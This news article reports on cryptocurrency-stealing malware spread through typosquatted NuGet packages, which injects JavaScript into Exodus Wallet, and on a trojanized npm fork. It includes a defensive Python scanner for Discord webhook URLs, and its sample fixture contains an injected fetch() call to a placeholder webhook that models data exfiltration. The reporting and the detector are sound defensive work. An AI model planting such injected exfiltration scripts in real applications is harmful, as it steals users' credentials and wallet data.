
Cryptocurrency Stealing Malware Distributed via 13 NuGet Packages
Cybersecurity researchers have detailed the inner workings of cryptocurrency-stealing malware that was distributed via 13 malicious NuGet packages as part of a supply chain attack targeting .NET developers.
The typosquatting campaign, spotted by JFrog late last month, masquerades as legitimate packages in order to execute PowerShell code designed to fetch a second-stage binary from hard-coded servers.
The two-stage attack culminates in the deployment of a .NET-based persistent backdoor, called Impala Stealer, which is able to gain unauthorized access to users’ cryptocurrency accounts.
“The payload uses a very rare obfuscation technique, called ‘.NET AoT compilation’, which is far more stealthy than using an ‘off the shelf’ obfuscator while still making binaries difficult to reverse engineer,” JFrog told The Hacker News in a statement.
.NET AoT compilation is an optimization technique that allows apps to be precompiled to native code. Native AOT apps also have a faster startup time and a smaller memory footprint, and can run on machines without the .NET runtime installed.
The second-stage payload comes with an automatic update mechanism that allows it to fetch new versions of executables from remote locations. It further achieves persistence by injecting JavaScript code into the Discord application or Microsoft Visual Studio Code, thus enabling the launch of the stealer binary.

The binary then proceeds to search for installations of the Exodus Wallet desktop application and inject JavaScript code into various HTML files to harvest sensitive data and exfiltrate it to hard-coded Discord webhooks.
The JavaScript snippet, for its part, was retrieved from an online paste site, from which it has since been removed. That said, it is suspected that the code may have been used to steal user credentials and access other information of interest.
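As an added, defender-side example that is not from the article or from JFrog's report: a small scan that walks an application's resource directory and flags HTML or JavaScript files whose inline scripts carry a hard-coded Discord webhook URL, the exfiltration channel described above. The directory layout and the injected page are constructed sample data, not Exodus's real files.

```python
import re
import tempfile
from pathlib import Path

# Discord webhook URLs have a fixed shape: /api/webhooks/<numeric id>/<token>.
WEBHOOK_RE = re.compile(r"https?://(?:\w+\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+")
# Inline <script> blocks, where an injected snippet lands inside an HTML page.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

def scan_html(text):
    """Return webhook URLs found inside the inline <script> blocks of one HTML document."""
    hits = []
    for body in SCRIPT_RE.findall(text):
        hits.extend(WEBHOOK_RE.findall(body))
    return hits

def scan_tree(root):
    """Walk an app's resource directory; map each HTML/JS file that references a
    Discord webhook to the distinct URLs it carries."""
    findings = {}
    for path in Path(root).rglob("*"):
        ext = path.suffix.lower()
        if ext not in (".html", ".htm", ".js"):
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        hits = WEBHOOK_RE.findall(text) if ext == ".js" else scan_html(text)
        if hits:
            findings[path.relative_to(root).as_posix()] = sorted(set(hits))
    return findings

# Constructed sample pages (hypothetical layout, not Exodus's real files): a clean
# page referencing only a local bundle, and one with an injected inline script that
# points at a placeholder webhook URL.
CLEAN_PAGE = "<html><body><script src='bundle.js'></script></body></html>"
INJECTED_PAGE = (
    "<html><body><script src='bundle.js'></script>"
    "<script>fetch('https://discord.com/api/webhooks/000000000000000000/"
    "PLACEHOLDER_TOKEN', {method: 'POST'});</script></body></html>"
)

def demo():
    """Build the sample tree in a temp dir and return what the scan flags."""
    with tempfile.TemporaryDirectory() as tmp:
        ui = Path(tmp) / "resources" / "ui"
        ui.mkdir(parents=True)
        (ui / "index.html").write_text(CLEAN_PAGE, encoding="utf-8")
        (ui / "wallet.html").write_text(INJECTED_PAGE, encoding="utf-8")
        return scan_tree(tmp)
```

Pointing `scan_tree` at a wallet or chat client's unpacked resources gives a quick integrity check; any hit deserves a comparison against a clean install of the same version.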
“Bad actors use typosquatting techniques to deploy custom malicious payloads (…) that target the Exodus crypto wallet and leak victims’ credentials to cryptocurrency exchanges, using code injection,” said Shachar Menashe, senior director at JFrog Security Research.
“Our investigation proves that no open source software repository can be truly trusted, so security measures must be taken at every step of the software development lifecycle to ensure the software supply chain remains secure.”
The findings come as Phylum discovered a malicious npm package called mathjs-min that was uploaded to the repository on March 26, 2023, and was found to harbor a credential stealer that retrieved Discord passwords from the official app as well as from web browsers such as Google Chrome, Brave, and Opera.
“This package is actually a modified version of the widely used JavaScript math library, and was injected with malicious code after being forked,” the software supply chain security company said. “A modified version was then published to NPM with the intention of providing it as a mini version of the original math library.”